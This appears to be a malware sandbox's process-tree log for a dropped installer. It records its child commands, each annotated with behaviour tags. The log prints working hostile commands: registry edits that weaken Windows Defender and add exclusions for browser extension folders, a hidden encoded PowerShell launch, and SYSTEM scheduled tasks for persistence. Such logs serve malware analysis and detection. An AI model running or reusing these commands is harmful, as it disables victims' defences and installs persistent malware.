C:\Users\Admin\AppData\Local\Temp\7zS32B8.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS32B8.tmp\Install.exe Fh /DHspdidbpSM 385137 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2468
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4196
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSzduEfHsNpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSzduEfHsNpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dNSKkTdIqXSDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dNSKkTdIqXSDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fhnTwgTKABUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fhnTwgTKABUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lIJEFxkNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lIJEFxkNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PUnbqvJlgjHAWzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PUnbqvJlgjHAWzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UnkSsAUmPJldPerG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UnkSsAUmPJldPerG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:323⤵PID:3168
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:324⤵PID:264
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:643⤵PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSzduEfHsNpU2" /t REG_DWORD /d 0 /reg:323⤵PID:3844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSzduEfHsNpU2" /t REG_DWORD /d 0 /reg:643⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dNSKkTdIqXSDC" /t REG_DWORD /d 0 /reg:323⤵PID:3120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dNSKkTdIqXSDC" /t REG_DWORD /d 0 /reg:643⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fhnTwgTKABUn" /t REG_DWORD /d 0 /reg:323⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fhnTwgTKABUn" /t REG_DWORD /d 0 /reg:643⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lIJEFxkNU" /t REG_DWORD /d 0 /reg:323⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lIJEFxkNU" /t REG_DWORD /d 0 /reg:643⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PUnbqvJlgjHAWzVB /t REG_DWORD /d 0 /reg:323⤵PID:3544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PUnbqvJlgjHAWzVB /t REG_DWORD /d 0 /reg:643⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl /t REG_DWORD /d 0 /reg:323⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl /t REG_DWORD /d 0 /reg:643⤵PID:4064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UnkSsAUmPJldPerG /t REG_DWORD /d 0 /reg:323⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UnkSsAUmPJldPerG /t REG_DWORD /d 0 /reg:643⤵PID:1088
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaTmzarRO" /SC once /ST 05:30:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:4640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaTmzarRO"2⤵PID:3948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaTmzarRO"2⤵PID:2780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NDvladDJhDVrRoudV" /SC once /ST 05:53:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\GZwQBNE.exe\" Mv /GNOGdidkA 385137 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NDvladDJhDVrRoudV"2⤵PID:1356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 9282⤵
- Program crash
PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4256
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3536
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2216
-
C:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\GZwQBNE.exeC:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\GZwQBNE.exe Mv /GNOGdidkA 385137 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3120 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRGikqFCffkwOXLBIB"2⤵PID:4412
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5064
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:3032
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:4612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lIJEFxkNU\KCaChb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YVjRlmjtlQYvPsI" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YVjRlmjtlQYvPsI2" /F /xml "C:\Program Files (x86)\lIJEFxkNU\wsYCeJd.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YVjRlmjtlQYvPsI"2⤵PID:744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YVjRlmjtlQYvPsI"2⤵PID:2408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vyKaxqxekDmxZa" /F /xml "C:\Program Files (x86)\LSzduEfHsNpU2\OznrbVf.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ozZsjsYGhfiRl2" /F /xml "C:\ProgramData\PUnbqvJlgjHAWzVB\ZDONpTI.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qsoizQKWdWcYNxmUb2" /F /xml "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\hVGhfrj.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OlGMRtymGsXLsrUaJtj2" /F /xml "C:\Program Files (x86)\dNSKkTdIqXSDC\lcChnGW.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3040
